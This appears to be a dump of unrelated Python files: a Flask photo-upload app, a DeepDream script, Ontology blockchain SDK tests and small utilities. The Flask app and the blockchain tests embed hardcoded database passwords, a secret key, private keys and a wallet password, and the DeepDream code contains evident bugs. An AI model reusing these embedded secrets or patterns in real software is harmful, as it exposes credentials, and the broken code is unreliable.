current = input('Type in a number manually:\\n')\n if current.isdecimal() and int(current) > 0:\n break\n\n return current\n\n\n def get_database():\n # load comic database from json into python dict\n try:\n json_file = open('%s/Data/web_data.json'%os.path.dirname(os.path.realpath(__file__)),encoding='utf-8')\n comic_db = json.load(json_file)\n json_file.close()\n except FileNotFoundError:\n comic_db = {}\n except json.decoder.JSONDecodeError:\n comic_db = {}\n return comic_db\n\n\n def update_database(comic_db):\n json_file = open('%s/Data/web_data.json'%os.path.dirname(os.path.realpath(__file__)), 'w',encoding='utf-8')\n json.dump(comic_db, json_file, indent=2)\n json_file.close()\n\n\n def get_path():\n path = os.path.dirname(os.path.realpath(__file__))\n return path\n\n\n def list_images():\n stored_images = os.listdir('%s/Images'%os.path.dirname(os.path.realpath(__file__)))\n return stored_images\n","sub_path":"database_client.py","file_name":"database_client.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"516648380","text":"import os\nimport csv\n\n#extracted and cleaned ticker list\nticker_list, clean_ticker_list = list() , list()\n\n#comple nasdaq company list\nufile = \"/home/atamayo/example_git/final_python/stock_list/companylist.csv\"\n#user current dir\ncwd = os.getcwd()\n#new company csv to read off of\nnew_u_file = \"complete_ticker_list.csv\"\n#complete path file\nabs_file_path = os.path.join(cwd,new_u_file)\n\ndef extract_ticker_symbols(u_file,ext_tix_symbols,clean_ticker_list):\n\twith open(u_file, newline='') as opencsv:\n\t\treader = csv.reader(opencsv,quotechar=',')\n\t\tfor row in reader:\n\t\t\tfor items in row[0:1]:\n\t\t\t\text_tix_symbols.append(items)\n\t\tprint(\"Successfully extracted data\")\n\tfor tix in ext_tix_symbols:\n\t\ttix = tix.replace('\"','')\n\t\tclean_ticker_list.append(tix)\n\tprint('Removed extra quotes')\n\treturn clean_ticker_list\n\n\ndef create_csv_file(new_complete_csv_file,abs_path):\n\t#checkin if csv exists, if not create one!, else we break\n\tfor r,d,f in os.walk(cwd):\n\t\tif not os.path.isfile(abs_file_path):\n\t\t\tprint('file not found, creating new one in current directory named\\n \\\n\t\t\t\tcomplete_ticker_list.csv')\n\t\t\tfp = open(abs_path,'w+')\n\t\t\tfp.close()\n\t\t\tprint(\"created_new_csv file\")\n\t\t\tbreak\n\t\telse:\n\t\t\tprint('found existing file')\n\t\t\tbreak\n\ndef write_to_csv(abs_path,cleaned_tix_symbols):\n\tcleaned_tix_symbols.sort()\n\twith open(abs_path, 'w+') as csvfile:\n\t\tfieldnames = ['TIX_symbols']\n\t\twriter = csv.DictWriter(csvfile,fieldnames=fieldnames)\n\t\twriter.writeheader()\n\n\t\tfor tix in cleaned_tix_symbols:\n\t\t\twriter.writerow({'TIX_symbols': tix})\n\tprint('Successfully wrote tix to new csv file')\n\n\ndef main():\n\tcreate_csv_file(new_u_file,abs_file_path)\n\textract_ticker_symbols(ufile,ticker_list,clean_ticker_list)\n\twrite_to_csv(abs_file_path,clean_ticker_list)\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"stock_list/extract_and_write_to_csv.py","file_name":"extract_and_write_to_csv.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"177800053","text":"from flask import Flask, request, render_template, flash, redirect, url_for\nfrom flask_uploads import UploadSet, configure_uploads, IMAGES, patch_request_class\nfrom flask_wtf import FlaskForm\nfrom flask_wtf.file import FileField, FileRequired, FileAllowed \nimport re\nfrom flask_sqlalchemy import SQLAlchemy\nfrom models import Member, db, Image\nfrom wtforms import validators\nfrom forms import MemberForm, ImageForm, ImageSearch\nimport flask\nimport os\nfrom tables import Image_Results\nimport secrets\nfrom flask_login import current_user\n\nbasedirectory = os.path.abspath(os.path.dirname(__file__))#basedir to use in imageloading\n\napp = Flask(__name__)\n\nuserpass = 'mysql+pymysql://joshlufafa:fhdu23AJ8j3hmvbluf@'\nbasedir = '127.0.0.1'\n# change to YOUR database name, with a slash added as shown\ndbname = '/kyambogosda'\n# this socket is going to be very different on a Windows computer\n#socket = '?unix_socket=/Applications/XAMPP/xamppfiles/var/mysql/mysql.sock'\n\n\n# put them all together as a string that shows SQLAlchemy where the database is\napp.config['SQLALCHEMY_DATABASE_URI'] = userpass + basedir + dbname\n\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\napp.config['SECRET_KEY'] = 'Agdgajj938n2!gjjskg@;[pbqbktofd'\n\napp.config['UPLOADED_PHOTOS_DEST'] = os.path.join(basedirectory, 'static/img') # you'll need to create a folder named uploads\n\nPHOTO_FOLDER = os.path.join('static', 'img')\napp.config['UPLOAD_FOLDER'] = PHOTO_FOLDER\n#db = SQLAlchemy(app)#initialise the database configuration\n\nphotos = UploadSet('photos', IMAGES)\nconfigure_uploads(app, photos)\npatch_request_class(app) # set maximum file size, default is 16MB\n\n # class UploadForm(FlaskForm):\n # image = FileField(u'Image File', [validators.regexp(r'^[^/\\\\]\\.jpg$')])\n # description = TextAreaField(u'Image Description')\n\n # def validate_image(form, field):\n # if field.data:\n # field.data = re.sub(r'[^a-z0-9_.-]', '_', field.data)\n\ndb = SQLAlchemy(app)\n\n\nclass UploadForm(FlaskForm):\n photo = FileField(validators=[FileAllowed(['png', 'jpg']), FileRequired('File was empty!')])\n \n\n@app.route('/image_final', methods=['GET', 'POST'])#Use this method to test the us of this field with other form fields\ndef upload_file():\n image = Image()\n form = ImageForm()#The request method brings about the frontend error in the template file ie \"No file was chosen\"\n if form.validate_on_submit():\n filename = photos.save(form.photo.data)\n file_url = photos.url(filename)\n f_name, f_ext = os.path.splitext(filename)\n picture_fn = f_name + f_ext\n picture_path = os.path.join(app.root_path, 'static/profile_pics', picture_fn)\n image.image_file = picture_fn#Dont forget to change the image path if it workd later on\n image.name = form.name.data\n db.session.add(image)\n db.session.commit()\n else:\n file_url = None\n\n return render_template('image_final.html', form=form, file_url=file_url)\n\n@app.route('/edit-image', methods=['GET', 'POST'])\ndef edit():\n image = Image()#\n form = ImageForm()\n qry = db.session.query(Image).filter(Image.name.contains(\"oben\"))\n image_fn = qry.first()#result from the query \n image_file = url_for('static', filename='img/' + image_fn.image_file)#\n\n if form.validate_on_submit():\n filename = photos.save(form.photo.data)\n file_url = photos.url(filename)\n f_name, f_ext = os.path.splitext(filename)\n picture_fn = f_name + f_ext\n picture_path = os.path.join(app.root_path, 'static/profile_pics', picture_fn)\n image_fn.image_file = picture_fn#Dont forget to change the image path if it workd later on\n #image_fn.name = form.name.data\n #db.session.add(image)\n db.session.commit()\n else:\n file_url = None\n return render_template('edit-image.html', form=form, file_url=file_url, image_file=image_file)\n \n@app.route('/image-result', methods=['GET', 'POST'])\ndef view_image():\n image = Image()#\n qry = db.session.query(Image).filter(Image.name.contains(\"oben\"))\n image_fn = qry.first()#result from the query \n\n image_file = url_for('static', filename='img/' + image_fn.image_file)#This concatenates the image iflename and extension to the static/img folder where the images are uploaded and saved \n full_filename = os.path.join(app.config['UPLOAD_FOLDER'], image_fn.image_file) #this is the filepath to the image displayed in the html template \n return render_template('image-result.html', image_file=image_file)\n\ndef save(member, form, picture_fn, new=False):#member args to pass data to our, form is the argument to pass the data to the member model\n member.image_file = picture_fn#The filename is the picture filename from the caller function new_member\n member.full_name = form.full_name.data\n member.gender = form.gender.data \n member.date_added = form.date_added.data \n member.telephone_no = form.telephone_no.data \n member.address = form.address.data \n member.a_o_residence = form.a_o_residence.data \n member.d_o_birth = form.d_o_birth.data\n member.age = form.age.data \n member.m_status = form.m_status.data \n member.no_children = form.no_children.data \n member.occupation = form.occupation.data \n member.l_o_educ = form.l_o_educ.data \n member.p_o_work = form.p_o_work.data\n member.employer = form.employer.data \n member.nationality = form.nationality.data\n member.tribe = form.tribe.data\n member.clan = form.clan.data\n member.ch_born = form.ch_born.data \n member.f_faith = form.f_faith.data\n member.d_o_baptism = form.d_o_baptism.data\n member.ch_of_baptism = form.ch_of_baptism.data\n member.ch_family = form.ch_family.data\n member.l_o_AY = form.l_o_AY.data \n member.lang_spoken = form.lang_spoken.data\n member.skills = form.skills.data \n member.inc_projects = form.inc_projects.data \n member.hobbies = form.hobbies.data\n member.ch_programs = form.ch_programs.data\n \n if new:\n db.session.add(member)\n db.session.commit()#s\n\n\n@app.route('/image_load', methods=['GET', 'POST'])#Use this method to test the us of this field with other form fields\ndef reister():\n form = MemberForm()#The request method brings about the frontend error in the template file ie \"No file was chosen\"\n #form = UploadForm()#The request method brings about the frontend error in the template file ie \"No file was chosen\"\n if request.method == 'POST' and form.validate_on_submit():\n member = Member()#Instantiate the member model \n filename = photos.save(form.photo.data)\n file_url = photos.url(filename)\n f_name, f_ext = os.path.splitext(filename)\n picture_fn = f_name + f_ext\n #member.image_file = picture_fn\n save(member, form, picture_fn, new=True)#The picture filename is passed as an arguement to the save function\n flash(\"Successfully created new member\")\n \n else:\n file_url = None\n\n return render_template('image_load.html', form=form, file_url=file_url)\n \n\ndef save_picture(form_picture):\n random_hex = secrets.token_hex(8)\n _, f_ext = os.path.splitext(form_picture.filename) \n picture_fn = random_hex + f_ext\n picture_path = os.path.join(app.root_path, 'static/img', picture_fn)\n form_picture.save(picture_path) \n\n return picture_fn\n\n\n@app.route('/image', methods=['GET', 'POST'])\ndef test():\n form = ImageForm()\n image = Image()\n if form.validate_on_submit():\n if form.photo.data:\n picture_file = save_picture(form.photo.data)\n image.image_file = picture_file\n image.name = form.name.data\n db.session.add(image)\n db.session.commit()\n \n #image_file = url_for('static', filename='img' + image_f) \n return render_template('image.html', form=form)\n\nif __name__ == '__main__':\n app.run()","sub_path":"final_app/application/imagetest.py","file_name":"imagetest.py","file_ext":"py","file_size_in_byte":7923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"9106484","text":"class Group(db.Model, TimestampMixin):\n \"\"\"A group is a collection of users who are either members or invited.\n Groups are created when a member not in a group invites another member.\n Invited members may accept or decline invitations. Active members may\n revoke invitations and remove members (including themselves).\n A group must have at least 2 participants.\n Degenerate groups are deleted.\n \"\"\"\n id = db.Column(db.Integer(), primary_key=True)\n assignment_id = db.Column(db.ForeignKey(\"assignment.id\"), nullable=False)\n\n assignment = db.relationship(\"Assignment\")\n\n","sub_path":"callgraph/parse/codes/94.py","file_name":"94.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"129889062","text":"# import necessary packages\nfrom keras.applications import InceptionV3\nfrom keras.applications.inception_v3 import preprocess_input\nfrom keras.preprocessing.image import img_to_array\nfrom keras.preprocessing.image import load_img\nfrom keras import backend as K\nfrom scipy import ndimage\nimport numpy as np\nimport argparse\nimport cv2\n\ndef preprocess(p):\n # load the input image and convert it to a keras-compatible\n # format. Expand the dimensions so we can pass it through the\n # model, and finaly preprocess it for input to inception network\n image = load_img(p)\n image = img_to_array(image)\n image = np.expand_dims(image, axis=0)\n image = preprocess_input(image)\n\n # return the preprocessed image\n return image\n\ndef deprocess(p):\n # we are using channels last ordering\n image = image.reshape((image.shape[1], image.shape[2], 3))\n\n # undo the preprocessing\n image /= 255\n image += 0.5\n image *= 255\n image = np.clip(image, 0, 255).astype(\"uint8\")\n\n # we have been processing images in RGB, so convert\n # to BGR for OpenCV\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n\n # return the deprocessed image\n return image\n\ndef fetchLossGrads(X):\n pass\n\ndef resize_image(image, size):\n # resize the image\n resized = np.copy(image)\n resized = ndimage.zoom(resized,\n (1, float(size[0]) / resized.shape[1],\n float(size[1]) / resized.shape[2], 1), order=1)\n\n # return the resized image\n return resized\n\ndef eval_loss_and_gradients(X):\n # fetch the loss and gradients given the input\n output = fetchLossGrads([X])\n (loss, G) = (output[0], output[1])\n\n # return tuple of loss and gradients\n return (loss, G)\n\ndef gradient_ascent(X, iters, alpha, maxLoss=-np.inf):\n # loop over our number of iterations\n for i in range(0, iters):\n # compute the loss and gradient\n (loss, G) = eval_loss_and_gradients(X)\n\n # if the loss is greater than the max loss, break from\n # the loop early to prevent strange effects\n if loss > maxLoss:\n break\n\n # take a step\n print(\"[INFO] Loss at {}: {}\".format(i, loss))\n X += alpha*G\n\n # return the output of gradient ascent\n return X\n\n# ***********************************************************************************\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required=True,\n help=\"path to the input image\")\nap.add_argument(\"-o\", \"--output\", required=True,\n help=\"path to the output image\")\nargs = vars(ap.parse_args())\n\n# define the dictionnary that include (1) the layers we are\n# going to use for the dreams and (2) their respective weights\n# (i.e the larger the weights, the more the layer is contributing)\nLAYERS = {\n \"mixed2\" : 2.0,\n \"mixed3\" : 5.0\n}\n\n# define the number of octaves, octave scale, alpha (step for gradient\n# ascent), number of iterations and max loss --tweaking theses values\n# will produce different dreams\nNUM_OCTAVE = 3\nOCTAVE_SCALE = 1.4\nALPHA = 0.001\nNUM_ITERS = 50\nMAX_LOSS = 10.0\n\n# indicate that keras *should not* be update the weights of any\n# layer during the deep dream\nK.set_learning_phase(0)\n\n# load the pre-trained Inception model from disk, then grab\n# reference variable to the input tensor of the model (which we'll\n# then be using to perform our CNN hallucinations)\nprint(\"[INFO] loading InceptionV3 model...\")\nmodel = InceptionV3(weights=\"imagenet\", include_top=False)\ndream = model.input\n\n# define the loss value, then build the dictionnary that maps the\n# *name* of each layer inside the Inception to the actual *layer*\n# object itself -- we'll need this mapping when building the loss\n# of the dreams\nloss = K.variable(0.0)\nlayerMap = {layer.name: layer for layer in model.layers}\n\n# loop over the layers that will be utilized in the dream\nfor layerName in LAYERS:\n # grab the output of the layer we will use for dreaming, then\n # add the L2-norm on the features to the layer to the loss (we\n # use array slicing here to avoid border artifacts caused by\n # border pixels)\n x = layerMap[layerName].output\n coeff = LAYERS[layerName]\n scaling = K.prod(K.cast(K.shape(x), \"float32\"))\n loss += coeff * K.sum(K.square(x[:, 2:-2, 2:-2, :])) / scaling\n\n# compute the gradients\ngrads = K.gradients(loss, dream)[0]\ngrads /= K.maximum(K.mean(K.abs(grads)), 1e-7)\n\n# define a function that can retrieve the value of the loss\n# and the gradients given an input image\noutputs = [loss, grads]\nfetchLossGrads = K.function([dream], outputs)\n\n# load and preprocess the input image, then grab the (original) input\n# height and width\nimage = preprocess(args[\"image\"])\ndims = image.shape[1:3]\n\n# in order to perform deep dreaming we need to build multiple scales\n# of the original input image (i.e set of images at lower and lower resolutions)\n# -- this list stores the spatial dimensions that we will be resizing our image to\noctaveDims = [dims]\n\n# loop over the octaves (resolutions)\nfor i in range (1, NUM_OCTAVE):\n # compute the spatial dimensions (i.e width and height) for the\n # current octave, then update the dimensions list\n size = [int(d / (OCTAVE_SCALE ** i)) for d in dims]\n octaveDims.append(size)\n\n# reverse the octave dimensions list order so the smallest\n# is at first position\noctaveDims = octaveDims[::-1]\n\n# clone the original image and then create a resized input image\n# that matches the smallest dimension\norig = np.copy(image)\nshrunk = resize_image(image, octaveDims[0])\n\n# loop over the octave dimensions from smallest to largest\nfor (o, size) in enumerate(octaveDims):\n # resize the image and then apply gradient ascent\n print(\"[INFO] starting octave {}...\".format(o))\n image = resize_image(image, size)\n image = gradient_ascent(image, iters=NUM_ITERS, alpha=ALPHA,\n maxLoss=MAX_LOSS)\n\n # to compute the lost details we need two images :\n # (1) the shrunk image that has been upscaled to the current octave\n # (2) the original image that has been downscaled to the current octave\n upscaled = resize_image(shrunk, size)\n downscaled = resize_image(orig, size)\n\n # the lost detail is computed via a simple subtraction which we\n #immediately back in to the image we applied gradient ascent on\n lost = downscaled - upscaled\n image += lost\n\n # make the original image be the new shrunk image so we can\n #repeat the process\n shrunk = resize_image(orig, size)\n\n# deprocess image, show it and write it to disk\nimage = deprocess(image)\ncv2.imshow(\"DeepDrem\", image)\ncv2.imwrite(args[\"output\"], image)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"DNN/dnn-nst/deepdream.py","file_name":"deepdream.py","file_ext":"py","file_size_in_byte":6428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"497282875","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport time\nimport unittest\nimport base58\nimport base64\nimport binascii\n\n\nfrom ontology.utils import util\nfrom ontology.common.define import *\nfrom ontology.common.address import Address\nfrom ontology.account.account import Account\nfrom ontology.ont_sdk import OntologySdk\nfrom ontology.crypto.signature_scheme import SignatureScheme\nfrom ontology.smart_contract.native_contract.asset import Asset\nfrom ontology.crypto.signature_scheme import SignatureScheme\nfrom ontology.core.transaction import Transaction\nfrom ontology.vm.build_vm import build_native_invoke_code, build_neo_vm_param\nfrom ontology.smart_contract.neo_vm import NeoVm\nfrom ontology.smart_contract.neo_contract.abi.build_params import BuildParams\nfrom ontology.smart_contract.neo_contract.abi.abi_function import AbiFunction\n\n#rpc_address = \"http://polaris3.ont.io:20336\"\nrpc_address = \"http://127.0.0.1:20336\"\nsdk = OntologySdk()\n#sdk.rpc.set_address(rpc_address)\nsdk.set_rpc((rpc_address))\nprivate_key = \"523c5fcf74823831756f0bcb3634234f10b3beb1c05595058534577752ad2d9f\"\nprivate_key2 = \"75de8489fcb2dcaf2ef3cd607feffde18789de7da129b5e97c81e001793cb7cf\"\nprivate_key3 = \"1383ed1fe570b6673351f1a30a66b21204918ef8f673e864769fa2a653401114\"\nacc = Account(private_key, SignatureScheme.SHA256withECDSA)\nacc2 = Account(private_key2, SignatureScheme.SHA256withECDSA)\nacc3 = Account(private_key3, SignatureScheme.SHA256withECDSA)\n\n\nclass TestAsset(unittest.TestCase):\n def test_aaa(self):\n bytearray.fromhex(\"87986fa27ad23c1bdf76373a7e5ddd727232a49f138d26d37435f79126273c8f\")\n def test_a(self):\n tx_hash='2425f5b29766ece045fc3967ec18d56a2c9c23650541c6a3850b8037fb613b22'\n event=sdk.rpc.get_smart_contract_event_by_tx_hash(tx_hash)\n print(event)\n\n\n def test_transfer_Ont(self):\n wallet_path = \"C:\\\\Go_WorkSpace\\\\src\\\\github.com\\\\ontio\\\\ontology\\\\_Wallet_\\\\wallet.dat\"\n sdk.wallet_manager.open_wallet(wallet_path)\n acct1_addr = \"AQf4Mzu1YJrhz9f3aRkkwSm9n3qhXGSh4p\"\n acct1_pwd = \"xinhao\"\n acct1 = sdk.wallet_manager.get_account(acct1_addr, acct1_pwd)\n # export several keys\n wif_key = acct1.export_wif()\n print(\"wif_key is \", wif_key)\n private_key_bytes = acct1.get_privatekey_from_wif(wif_key)\n print(\"private_key_bytes is \", private_key_bytes, type(private_key_bytes))\n private_key_str = private_key_bytes.hex()\n print(\"private_key_str is \", private_key_str)\n\n contract_address_str = \"0000000000000000000000000000000000000001\"\n contract_address_bytearray = bytearray.fromhex(contract_address_str)\n contract_address = contract_address_bytearray\n # contract_address.reverse()\n print(\"my converted contract_address is \", contract_address)\n print(\"the givencontract_address is \", ONT_CONTRACT_ADDRESS)\n\n print('contract_address is ', contract_address)\n mybalance_1 = sdk.rpc.get_balance(acct1.get_address_base58())\n print(\"acc wif_key is \", acc.export_wif())\n\n from_acc = acct1\n to_acc = acc\n asset = \"ong\"\n balance_1 = sdk.rpc.get_balance(from_acc.get_address_base58())\n print(\"mybalance_1 is \", mybalance_1)\n print(\"balance_1 is \", balance_1)\n ass = Asset(sdk)\n from_addr = from_acc.get_address_base58()\n to_addr = to_acc.get_address_base58()\n print(\"Transfer from \" + from_addr + \" to \" + to_addr)\n amount = int(int(balance_1[asset])/2)\n print(\"amount is \", amount, type(amount))\n payer = acct1.get_address_base58()\n gaslimit = 20000\n gasprice = 500\n\n # print('ong balance is ', sdk.rpc.get_balance(from_acc.get_address_base58()))\n # # int(ass.unbound_ong(from_addr))\n # ass.send_withdraw_ong_transaction(from_acc, to_addr, 100, to_acc,gaslimit, gasprice)\n #\n # print('ong balance is ', sdk.rpc.get_balance(from_acc.get_address_base58()))\n\n tx = ass.new_transfer_transaction(asset,from_addr, to_addr, amount, payer, gaslimit, gasprice)\n sdk.sign_transaction(tx, acct1)\n # sdk.sign_transaction(tx, to_acc)\n res = sdk.rpc.send_raw_transaction(tx)\n print(\"res in test_transfer_Ont is \", res)\n\n\n\n def test_open_wallet_account_from_path(self):\n ''' Open wallet and get account'''\n # wallet_path = \"C:\\\\Go_WorkSpace\\\\src\\\\github.com\\\\ontio\\\\ontology\\\\_Wallet_\\\\wallet.dat\"\n wallet_path = \"D:\\\\SmartX_accounts\\\\Cyano Wallet\\\\testnet\\\\mywallet1\\\\\"\n sdk.wallet_manager.open_wallet(wallet_path)\n acct1_addr = \"AQf4Mzu1YJrhz9f3aRkkwSm9n3qhXGSh4p\"\n acct2_addr = \"ASUwFccvYFrrWR6vsZhhNszLFNvCLA5qS6\"\n acct3_addr = \"AWf8NiLzXSDf1JB2Ae6YUKSHke4yLHMVCm\"\n acct1_pwd = \"xinhao\"\n acct1 = sdk.wallet_manager.get_account(acct1_addr, acct1_pwd)\n acct2 = sdk.wallet_manager.get_account(acct2_addr, acct1_pwd)\n acct3 = sdk.wallet_manager.get_account(acct3_addr, acct1_pwd)\n '''export several keys'''\n account = acct3\n wif_key = account.export_wif()\n print(\"wif_key is \", wif_key)\n private_key_bytes = account.get_privatekey_from_wif(wif_key)\n print(\"private_key_bytes is \", private_key_bytes, type(private_key_bytes))\n private_key_str = private_key_bytes.hex()\n print(\"private_key_str is \", private_key_str, type(private_key_str))\n\n\n pwd = acct1_pwd\n addr = \"ANjLDUU9htLKe41yxzVKpiPmFNseA3N9gc\"\n salt = \"XeK1Nkv8F8qKxXtLEPSbRw==\"\n nounce = 16384\n scheme = SignatureScheme.SHA256withECDSA\n private_key_str = private_key_bytes.hex()\n print(\"private_key_str is \", private_key_str, type(private_key_str))\n ''' send transaction without signer'''\n version = 0\n tx_type = 0xd1\n unix_time_now = int(time.time())\n nonce = unix_time_now\n gas_price = 0\n gas_limit = 20000\n payer = None\n payload = None\n attributes = None\n sigs = None\n hash = None\n '''\n contract_address_str = \"749a701ae89c0dbdab9b4b660ba84ee478004219\"\n contract_address_bytearray = bytearray.fromhex(contract_address_str)\n contract_address = contract_address_bytearray\n contract_address.reverse()\n print('contract_address is ', contract_address)\n '''\n '''\n contract_address = util.get_asset_address(\"ont\")\n #state = [{\"address\": \"ASUwFccvYFrrWR6vsZhhNszLFNvCLA5qS6\", \"to\": \"AQf4Mzu1YJrhz9f3aRkkwSm9n3qhXGSh4p\", \"amount\": 10000}]\n b58_address = \"ASUwFccvYFrrWR6vsZhhNszLFNvCLA5qS6\"\n raw_address = Address.b58decode(b58_address)\n #sdk.neo_vm().send_transaction(contract_address, acct1,[],20000, 0, )\n invoke_code = build_native_invoke_code(contract_address, bytes([0]), \"balanceOf\", raw_address)\n payer = raw_address\n tx = Transaction(0, 0xd1, unix_time_now, gas_price, gas_limit, payer, invoke_code, bytearray(), [], bytearray())\n #Transaction(0, 0xd1, unix_time_now, 0, 0, payer, invoke_code, bytearray(), [], bytearray())\n res = sdk.rpc.send_raw_transaction_pre_exec(tx)\n print('res is ', res)\n '''\n\n # Check balanceOf through NeoVm.make_invoke_transaction\n contract_address_str = \"f328cb02bb1bd3a25c32f3db9b5f20b6fc4e04ea\"\n contract_address_bytearray = bytearray.fromhex(contract_address_str)\n contract_address = contract_address_bytearray\n contract_address.reverse()\n print('contract_address is ', contract_address)\n params_list = []\n params_list.append(str(\"BalanceOf\").encode())\n param = []\n b58_address = \"AQf4Mzu1YJrhz9f3aRkkwSm9n3qhXGSh4p\"\n param.append(Address.b58decode(b58_address).to_array())\n params_list.append(param)\n params = BuildParams.create_code_params_script(params_list)\n # when pre-execute, don't use 0x67\n tx = NeoVm.make_invoke_transaction(bytearray(contract_address), bytearray(params), b'', 20000, 0)\n res = sdk.rpc.send_raw_transaction_pre_exec(tx)\n print(\"BalanceOf is \", res)\n\n # # Check totalsupply\n # params_list = []\n # params_list.append(str(\"totalSupply\").encode())\n # param = [10]\n # params_list.append(param)\n # params = BuildParams.create_code_params_script(params_list)\n # # when pre-execute, don't use 0x67\n # tx = NeoVm.make_invoke_transaction(bytearray(contract_address), bytearray(params), b'', 20000, 0)\n # res = sdk.rpc.send_raw_transaction_pre_exec(tx)\n # print('totalsupply is ', res)\n #\n # # Transfer through Transaction, send_raw_transaction\n # params_list = []\n # params_list.append(str(\"transfer\").encode())\n # from_addr = \"ASUwFccvYFrrWR6vsZhhNszLFNvCLA5qS6\"\n # to_addr = \"AQf4Mzu1YJrhz9f3aRkkwSm9n3qhXGSh4p\"\n # value = 100\n # param = []\n # param.append(Address.b58decode(from_addr).to_array())\n # param.append(Address.b58decode(to_addr).to_array())\n # param.append(value)\n # params_list.append(param)\n # params = BuildParams.create_code_params_script(params_list)\n # # when execute, use 0x67, then add the contract_address\n # params.append(0x67)\n # for i in contract_address:\n # params.append(i)\n # payer_raw_address = acct2.get_address().to_array()\n # payer_acct = acc2\n # unix_time_now = int(time.time())\n # tx = Transaction(0, 0xd1, unix_time_now, gas_price, gas_limit, payer_raw_address, params, bytearray(), [], bytearray())\n # sdk.sign_transaction(tx, acct2)\n # #sdk.add_sign_transaction(tx, payer_acct)\n # sdk.rpc.send_raw_transaction(tx)\n # # # Transfer through send_Transaction\n # # balance_Of_Addr = \"ASUwFccvYFrrWR6vsZhhNszLFNvCLA5qS6\"\n # # func = AbiFunction(\"balanceOf\", \"Integer\", [])\n # # func.set_params_value((binascii.a2b_hex(balance_Of_Addr)))\n # # balance = sdk.neo_vm().send_transaction(contract_address, None, None, 0, 0, func, True)\n # # Transfer through Transaction, send_raw_transaction\n\n ### check balance before transferMulti###\n print('### check balance Before transferMulti ###')\n params_list = []\n params_list.append(str(\"BalanceOf\").encode())\n param = []\n b58_address = \"AQf4Mzu1YJrhz9f3aRkkwSm9n3qhXGSh4p\"\n param.append(Address.b58decode(b58_address).to_array())\n params_list.append(param)\n params = BuildParams.create_code_params_script(params_list)\n # when pre-execute, don't use 0x67\n tx = NeoVm.make_invoke_transaction(bytearray(contract_address), bytearray(params), b'', 20000, 0)\n res = sdk.rpc.send_raw_transaction_pre_exec(tx)\n print(\"before TransferMulti, the balance is \", res)\n\n ### transferMulti\n params_list = []\n params_list.append(str(\"TransferMulti\").encode())\n from_addr1 = \"AQf4Mzu1YJrhz9f3aRkkwSm9n3qhXGSh4p\"\n from_addr2 = \"AQf4Mzu1YJrhz9f3aRkkwSm9n3qhXGSh4p\"\n to_addr1 = \"ASUwFccvYFrrWR6vsZhhNszLFNvCLA5qS6\"\n to_addr2 = \"AWf8NiLzXSDf1JB2Ae6YUKSHke4yLHMVCm\"\n value1 = 10000\n value2 = 10000\n param1 = []\n param1.append(Address.b58decode(from_addr1).to_array())\n param1.append(Address.b58decode(to_addr1).to_array())\n param1.append(value1)\n param2 = []\n param2.append(Address.b58decode(from_addr2).to_array())\n param2.append(Address.b58decode(to_addr2).to_array())\n param2.append(value2)\n params_list_tmp = []\n params_list_tmp.append(param1)\n params_list_tmp.append(param2)\n params_list.append(params_list_tmp)\n # params_list.append(param1)\n # params_list.append(param2)\n print(\" params_list is \", params_list)\n print(\" contract_address is \", contract_address)\n params = BuildParams.create_code_params_script(params_list)\n # when execute, use 0x67, then add the contract_address\n params.append(0x67)\n for i in contract_address:\n params.append(i)\n payer_raw_address = acct1.get_address().to_array()\n unix_time_now = int(time.time())\n tx = Transaction(0, 0xd1, unix_time_now, gas_price, gas_limit, payer_raw_address, params, bytearray(), [],\n bytearray())\n tx = sdk.sign_transaction(tx, acct1)\n # sdk.add_sign_transaction(tx, payer_acct)\n tx_hash = sdk.rpc.send_raw_transaction(tx)\n print('tx_hash is ', tx_hash)\n time.sleep(12)\n event=sdk.rpc.get_smart_contract_event_by_tx_hash(tx_hash)\n # event = sdk.rpc.get_block_by_hash(tx_hash)\n print(\"event is \", event)\n # print(\"tx_hash is \", tx_hash)\n # event = sdk.rpc.get_smart_contract_event_by_tx_hash(tx_hash)\n # print(\"event is \", event)\n\n\n #check balance After transferMulti\n print('### check balance After transferMulti ###')\n params_list = []\n params_list.append(str(\"BalanceOf\").encode())\n param = []\n b58_address = \"AQf4Mzu1YJrhz9f3aRkkwSm9n3qhXGSh4p\"\n param.append(Address.b58decode(b58_address).to_array())\n params_list.append(param)\n params = BuildParams.create_code_params_script(params_list)\n # when pre-execute, don't use 0x67\n tx = NeoVm.make_invoke_transaction(bytearray(contract_address), bytearray(params), b'', 20000, 0)\n\n res = sdk.rpc.send_raw_transaction_pre_exec(tx)\n print(\"After TransferMulti, the balance is \", res)\n\n\n\n\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":13666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"457165438","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\nfrom odoo.exceptions import UserError\n\nclass PersebayaTopup(models.Model):\n\t_name = 'persebaya.topup'\n\t_inherit = ['mail.thread', 'ir.needaction_mixin']\n\n\tnik = fields.Char(string=\"NIK\",size=16)\n\tnama = fields.Many2one('res.partner',string=\"Name\",readonly=True)\n\tsaldo_terkini = fields.Integer(related='nama.saldo',string=\"Coin\",readonly=True,store=True)\n\ttopup = fields.Integer(string=\"Top Up Value\")\n\n\t@api.onchange('nik')\n\tdef _get_partner(self):\n\t\tif self.nik:\n\t\t\tpartner_id = self.env['res.partner'].search([('nik','=',self.nik)])\n\t\t\tself.nama = partner_id.id\n\n\tdef proses_top_up(self):\n\t\tif self.topup > 1000000:\n\t\t\tpartner_id = self.env['res.partner'].search([('nik','=',self.nik)])\n\t\t\tsaldo = 